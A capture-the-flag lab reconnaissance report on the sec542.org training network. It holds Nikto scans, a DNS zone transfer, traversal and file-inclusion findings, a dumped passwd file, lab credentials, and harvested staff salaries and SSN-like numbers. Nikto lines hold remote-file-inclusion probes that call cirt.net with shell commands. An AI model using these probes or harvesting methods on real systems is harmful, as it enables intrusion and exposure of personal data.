DISCOVERY

IP ADDRESS: 10.42.50.26/16 (Internal) towards 10.42.5.0/24 (Web Servers)

No  IP address   Hostname(s)                                  OS
1   10.42.5.8    helpdesk.sec542.org                          Ubuntu Linux (Linux Kernel 2.6.13 - 2.6.32)
2   10.42.5.21   home.sec542.org                              Ubuntu Linux (Linux Kernel 2.6.13 - 2.6.32)
3   10.42.5.24   sec542.org, ns1.sec542.org, www.sec542.org   Ubuntu Linux (Linux Kernel 2.6.13 - 2.6.32)
4   10.42.5.42   phones.sec542.org                            Ubuntu Linux (Linux Kernel 2.6.13 - 2.6.32)
5   10.42.5.75   -                                            Ubuntu Linux (Linux Kernel 2.6.13 - 2.6.32)

Ports, services, status and banners per host:
No  Port    Service  Status  Banner
1   53/TCP  DOMAIN   OPEN    ISC BIND 9.5.0-P2
    80/TCP  HTTP     OPEN    Apache httpd 2.2.9 PHP/5.2.6-2ubuntu4.1
2   53/TCP  DOMAIN   OPEN    ISC BIND 9.5.0-P2
    80/TCP  HTTP     OPEN    Apache httpd 2.2.9
3   53/TCP  DOMAIN   OPEN    ISC BIND 9.5.0-P2
    80/TCP  HTTP     OPEN    Apache httpd 2.2.9
4   53/TCP  DOMAIN   OPEN    ISC BIND 9.5.0-P2
    80/TCP  HTTP     OPEN    Apache httpd 2.2.9
5   53/TCP  DOMAIN   OPEN    ISC BIND 9.5.0-P2
    80/TCP  HTTP     OPEN    Apache httpd 2.2.9

AXFR OUTPUT
sec542.org.            604800  IN  SOA    ns1.sec542.org. root.sec542.org. 42 604800 86400 2419200 604800
sec542.org.            604800  IN  NS     10.42.5.24.sec542.org.
sec542.org.            604800  IN  A      10.42.5.24
helpdesk.sec542.org.   604800  IN  A      10.42.5.8
home.sec542.org.       604800  IN  A      10.42.5.21
ns1.sec542.org.        604800  IN  CNAME  www.sec542.org.
phones.sec542.org.     604800  IN  A      10.42.5.42
www.sec542.org.        604800  IN  A      10.42.5.24
sec542.org.            604800  IN  SOA    ns1.sec542.org. root.sec542.org.
TRACEROUTE 1 Hop
FINDINGS
10.42.5.8 (helpdesk.sec542.org), Port 80

Nikto:
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.6-2ubuntu4.1 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.9 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 221848, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.

Directory discovered:
/index.php
/icons/
/server-status
/424242.php?ticket=9

Issue discovered:
/server-status (LOW)
/424242.php?ticket=? (INFO -> HIGH/SALARY)
Improper redirection after login (LOW)

Information Gathered:
Application /424242.php?ticket=?:
Arthur (IT Helpdesk)
Ed Skoudis () – Salary 1,000,000/year
Justin Searle () – Salary 1,000,000/year
Kevin Johnson () – Salary 1,000,000/year
Marvin (IT Security)
Mike Poor () – Salary 1,000,000/year
Peter Jones ()
Richard Vernon ()
Susan Sheridan ()
Tricia McMillan (HR)
Zaphod ()
10.42.5.21 (home.sec542.org), Port 80

Nikto:
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.6-2ubuntu4.1 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.9 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 221848, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /it/: This might be interesting... potential country code (Italy)
+ /iframe.php?file=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.

Directory discovered:
/base/
/content/
/icons/
/includes/
/wordpress/
/iframe.php
/index.php
/doc/
/it/
/sec542_oldforum/

Issue discovered:
XSS – URL: /wordpress/wp-admin/upgrade.php, PARAM: backto (GET) (LOW)
Directory Traversal – URL: /iframe.php, PARAM: content (POST) (HIGH)
Directory Traversal – URL: /it/ls.php, PARAM: directory (GET) (HIGH)
File Inclusion – URL: /iframe.php, PARAM: content (POST) (HIGH)
PHP Object Injection – WordPress 3.6.1 (HIGH)

Information Gathered:
Error Message: Document root: /ctf/phones/

Application /sec542_oldforum/ (PHPBB):
Username: admin (Admin User), Email: [email protected], Password: foobar
Username: testuser (Normal User), Email: [email protected], Password: password
Username: sec542 (Normal User), Email: [email protected], Password: sec542

Application /iframe.php (content=../../employees):
Kevin Johnson, 904-403-8024, 1111 Main St Jacksonville, FL
Mike Poor, 904-555-1234, 673C Jones Dr. Jacksonville FL
Ed Skoudis, 904-555-8888, 4444 Rouge Pl. Jacksonville FL
Justin Searle, 904-555-0364, 364 Guy Rd Jacksonville FL

Application /base/ (BASE):
Username: admin, Password: baser0ckz

UNIX passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:113:Gnome Display Manager:/var/lib/gdm:/bin/false
pulse:x:106:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false
saned:x:107:118::/home/saned:/bin/false
messagebus:x:108:119::/var/run/dbus:/bin/false
polkituser:x:109:120:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:122:Hardware abstraction layer,,,:/var/run/hald:/bin/false
sec542:x:1000:1000:Sec542 CtF,,,:/home/sec542:/bin/bash
mysql:x:112:125:MySQL Server,,,:/var/lib/mysql:/bin/false
bind:x:113:126::/var/cache/bind:/bin/false
10.42.5.24 (ns1.sec542.org, www.sec542.org, sec542.org), Port 80

Nikto:
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.6-2ubuntu4.1 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.9 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.

Directory discovered:
/about.html
/contact.html
/index.html
/style.css
/icons/

Issue discovered:
DNS AXFR (LOW)
Email Is Not Obfuscated (LOW)

Information Gathered:
Application (Portal/About Us) /:
Ford Prefect -- President -- [email protected]
Trillian -- Vice President -- [email protected]
Marvin Android -- Security -- [email protected]
Arthur Dent -- Help Desk -- [email protected]
10.42.5.42 (phones.sec542.org), Port 80

Nikto:
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.6-2ubuntu4.1 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.9 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 221848, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /?_CONFIG[files][functions_page]=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /?npage=-1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /?npage=1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /?show=http://cirt.net/rfiinc.txt??: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?1=lol&PAGES[lol]=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?AML_opensite=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?AMV_openconfig=1&AMV_serverpath=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?CONFIG[MWCHAT_Libs]=http://cirt.net/rfiinc.txt??: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?ConfigDir=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?DIR_PLUGINS=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?G_JGALL[inc_path]=http://cirt.net/rfiinc.txt?%00: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?HomeDir=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?Lang=AR&Page=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?Madoa=http://cirt.net/rfiinc.txt??: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?RP_PATH=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/

Directory discovered:
/index.php
/icons/

Issue discovered:
PHPInfo (LOW)

Information Gathered:
Application /:
ServerName: zaphod
Linux Kernel 2.6.27-11-generic i686
Email: [email protected]
Document root: /ctf/phones/
10.42.5.75, Port 80

Nikto:
+ The anti-clickjacking X-Frame-Options header is not present.
+ Retrieved x-powered-by header: PHP/5.2.6-2ubuntu4.1
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: index.php, index.html
+ PHP/5.2.6-2ubuntu4.1 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.9 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /index.php?1=lol&PAGES[lol]=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?AML_opensite=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?AMV_openconfig=1&AMV_serverpath=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?CONFIG[MWCHAT_Libs]=http://cirt.net/rfiinc.txt??: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?ConfigDir=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?DIR_PLUGINS=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?G_JGALL[inc_path]=http://cirt.net/rfiinc.txt?%00: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?HomeDir=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?Lang=AR&Page=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?Madoa=http://cirt.net/rfiinc.txt??: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?RP_PATH=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/

Directory discovered:
/icons/
/images/
/~root/
/~root/report.html
/index.html
/index.php

Issue discovered:
/~root/ (Bruteforce UNIX account)

Information Gathered:
Application (Social Security) /~root/report.html:
Kevin Johnson 555-55-7777
Mike Poor 123-45-6789
Ed Skoudis 999-88-7777
Justin Searle 567-42-1234
CTF INFORMATION GATHERING SUMMARY

No  Name             Position        Email              Phone No.     Social Security No.  Salary (Per Year)  Address
1   Arthur Dent      Help Desk       [email protected]
2   Ed Skoudis                                          904-555-8888  999-88-7777          1,000,000          4444 Rouge Pl. Jacksonville FL
3   Ford Prefect     President       [email protected]
4   Justin Searle                                       904-555-0364  567-42-1234          1,000,000          364 Guy Rd Jacksonville FL
5   Kevin Johnson                                       904-403-8024  555-55-7777          1,000,000          1111 Main St Jacksonville, FL
6   Marvin Android   IT Security     [email protected]
7   Mike Poor                                           904-555-1234  123-45-6789          1,000,000          673C Jones Dr. Jacksonville FL
8   Peter Jones
9   Richard Vernon
10  Susan Sheridan
11  Tricia McMillan
12  Trillian         Vice President  [email protected]
13  Zaphod           Server Admin    [email protected]